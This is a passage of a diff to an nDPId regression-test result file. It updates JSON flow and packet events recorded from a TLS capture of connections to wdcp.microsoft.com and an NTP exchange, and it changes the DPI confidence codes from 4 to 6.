+00932{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":240,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168079158,"flow_last_seen":1626168079207,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1626168079207,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53914,"dst_port":443,"l4_proto":"tcp","ndpi": 
{"confidence": {"6":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":241,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1626168079243,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1626168079243,"pkt":"8BiYFWV8WNVuaKQACABFAAA0S\/NAAG0GzQ8ocQovwKgBeQG70pvEiS5w0d8i8oAS\/\/++MAAAAgQFoAEDAwgBAQQC"} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":242,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":3,"flow_last_seen":1626168079243,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1626168079243,"pkt":"WNVuaKQA8BiYFWV8CABFAAAoAABAAEAGRg\/AqAF5KHEKL9KbAbvR3yLyxIkucVAQEADu7wAA"} -00932{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":243,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168079191,"flow_last_seen":1626168079243,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1626168079243,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53915,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01414{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":246,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1626168079158,"flow_last_seen":1626168079255,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":625,"midstream":0,"thread_ts_msec":1626168079255,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53914,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","server_names":"wdcp.microsoft.com,spynet2.microsoft.com,wdcpalt.microsoft.com,spynetalt.microsoft.com,*.cp.wd.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"17e97216fa7f4ec8c43090c6eed97c25","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Secure Server CA 2011","subjectDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, CN=wdcp.microsoft.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"81:41:67:66:7E:A9:1B:AA:61:3D:DE:D1:41:E7:17:13:CE:C4:3B:22"}} 
-01414{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":253,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1626168079191,"flow_last_seen":1626168079297,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":547,"midstream":0,"thread_ts_msec":1626168079297,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53915,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","server_names":"wdcp.microsoft.com,spynet2.microsoft.com,wdcpalt.microsoft.com,spynetalt.microsoft.com,*.cp.wd.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"17e97216fa7f4ec8c43090c6eed97c25","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Secure Server CA 2011","subjectDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, CN=wdcp.microsoft.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"81:41:67:66:7E:A9:1B:AA:61:3D:DE:D1:41:E7:17:13:CE:C4:3B:22"}} +00932{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":243,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168079191,"flow_last_seen":1626168079243,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1626168079243,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53915,"dst_port":443,"l4_proto":"tcp","ndpi": 
{"confidence": {"6":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01414{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":246,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1626168079158,"flow_last_seen":1626168079255,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":625,"midstream":0,"thread_ts_msec":1626168079255,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53914,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","server_names":"wdcp.microsoft.com,spynet2.microsoft.com,wdcpalt.microsoft.com,spynetalt.microsoft.com,*.cp.wd.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"17e97216fa7f4ec8c43090c6eed97c25","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Secure Server CA 2011","subjectDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, CN=wdcp.microsoft.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"81:41:67:66:7E:A9:1B:AA:61:3D:DE:D1:41:E7:17:13:CE:C4:3B:22"}} 
+01414{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":253,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1626168079191,"flow_last_seen":1626168079297,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":547,"midstream":0,"thread_ts_msec":1626168079297,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53915,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","server_names":"wdcp.microsoft.com,spynet2.microsoft.com,wdcpalt.microsoft.com,spynetalt.microsoft.com,*.cp.wd.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"17e97216fa7f4ec8c43090c6eed97c25","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Secure Server CA 2011","subjectDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, CN=wdcp.microsoft.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"81:41:67:66:7E:A9:1B:AA:61:3D:DE:D1:41:E7:17:13:CE:C4:3B:22"}} 
00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":259,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168079361,"flow_last_seen":1626168079361,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1626168079361,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"17.253.54.251","src_port":50288,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00515{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":259,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1626168079361,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1626168079361,"pkt":"WNVuaKQA8BiYFWV8CABFAABM2zIAAEARlFXAqAF5Ef02+8RwAHsAOAx5IwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} -00694{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":259,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168079361,"flow_last_seen":1626168079361,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1626168079361,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"17.253.54.251","src_port":50288,"dst_port":123,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"},"ntp": {"request_code":0,"version":0}} 
+00694{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":259,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168079361,"flow_last_seen":1626168079361,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1626168079361,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"17.253.54.251","src_port":50288,"dst_port":123,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"},"ntp": {"request_code":0,"version":0}} 00517{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":260,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1626168079391,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1626168079391,"pkt":"8BiYFWV8WNVuaKQACABFAABMVlxAADcR4isR\/Tb7wKgBeQB7xHAAOKCnJAED6wAAAAAAAAAMU0hNAOSX2YmMm6TtAAAAAAAAAADkl9mPcazl\/+SX2Y9xr5E6"} 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":263,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168079905,"flow_last_seen":1626168079905,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1626168079905,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53916,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":263,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1626168079905,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1626168079905,"pkt":"WNVuaKQA8BiYFWV8CABFAABAAABAAEAGRffAqAF5KHEKL9KcAbuMyd8CAAAAALAC\/\/\/ChQAAAgQFtAEDAwYBAQgKPdIBvwAAAAAEAgAA"} 
@@ -147,15 +147,15 @@ 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":264,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1626168079937,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1626168079937,"pkt":"WNVuaKQA8BiYFWV8CABFAABAAABAAEAGRffAqAF5KHEKL9KdAbvq1sJRAAAAALAC\/\/+BCAAAAgQFtAEDAwYBAQgKPdIB3wAAAAAEAgAA"} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":265,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1626168079957,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1626168079957,"pkt":"8BiYFWV8WNVuaKQACABFAAA0g1dAAG0GlasocQovwKgBeQG70pxuzvrNjMnfA4AS\/\/\/QkQAAAgQFoAEDAwgBAQQC"} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":266,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":1626168079957,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1626168079957,"pkt":"WNVuaKQA8BiYFWV8CABFAAAoAABAAEAGRg\/AqAF5KHEKL9KcAbuMyd8Dbs76zlAQEAABUQAA"} 
-00932{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":267,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168079905,"flow_last_seen":1626168079957,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1626168079957,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53916,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00932{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":267,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168079905,"flow_last_seen":1626168079957,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1626168079957,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53916,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":268,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1626168079986,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1626168079986,"pkt":"8BiYFWV8WNVuaKQACABFAAA0TOVAAG0GzB0ocQovwKgBeQG70p13uqY86tbCUoAS\/\/\/a2QAAAgQFoAEDAwgBAQQC"} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":269,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":1626168079986,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1626168079986,"pkt":"WNVuaKQA8BiYFWV8CABFAAAoAABAAEAGRg\/AqAF5KHEKL9KdAbvq1sJSd7qmPVAQEAALmQAA"} -00932{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":270,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168079937,"flow_last_seen":1626168079986,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1626168079986,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53917,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-01414{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":275,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1626168079905,"flow_last_seen":1626168080007,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":486,"midstream":0,"thread_ts_msec":1626168080007,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53916,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","server_names":"wdcp.microsoft.com,spynet2.microsoft.com,wdcpalt.microsoft.com,spynetalt.microsoft.com,*.cp.wd.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"17e97216fa7f4ec8c43090c6eed97c25","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Secure Server CA 2011","subjectDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, CN=wdcp.microsoft.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"81:41:67:66:7E:A9:1B:AA:61:3D:DE:D1:41:E7:17:13:CE:C4:3B:22"}} 
-01414{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":279,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1626168079937,"flow_last_seen":1626168080036,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":625,"midstream":0,"thread_ts_msec":1626168080036,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53917,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","server_names":"wdcp.microsoft.com,spynet2.microsoft.com,wdcpalt.microsoft.com,spynetalt.microsoft.com,*.cp.wd.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"17e97216fa7f4ec8c43090c6eed97c25","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Secure Server CA 2011","subjectDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, CN=wdcp.microsoft.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"81:41:67:66:7E:A9:1B:AA:61:3D:DE:D1:41:E7:17:13:CE:C4:3B:22"}} +00932{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":270,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168079937,"flow_last_seen":1626168079986,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1626168079986,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53917,"dst_port":443,"l4_proto":"tcp","ndpi": 
{"confidence": {"6":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01414{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":275,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1626168079905,"flow_last_seen":1626168080007,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":486,"midstream":0,"thread_ts_msec":1626168080007,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53916,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","server_names":"wdcp.microsoft.com,spynet2.microsoft.com,wdcpalt.microsoft.com,spynetalt.microsoft.com,*.cp.wd.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"17e97216fa7f4ec8c43090c6eed97c25","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Secure Server CA 2011","subjectDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, CN=wdcp.microsoft.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"81:41:67:66:7E:A9:1B:AA:61:3D:DE:D1:41:E7:17:13:CE:C4:3B:22"}} 
+01414{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":279,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1626168079937,"flow_last_seen":1626168080036,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":625,"midstream":0,"thread_ts_msec":1626168080036,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53917,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","server_names":"wdcp.microsoft.com,spynet2.microsoft.com,wdcpalt.microsoft.com,spynetalt.microsoft.com,*.cp.wd.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"17e97216fa7f4ec8c43090c6eed97c25","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Secure Server CA 2011","subjectDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, CN=wdcp.microsoft.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"81:41:67:66:7E:A9:1B:AA:61:3D:DE:D1:41:E7:17:13:CE:C4:3B:22"}} 
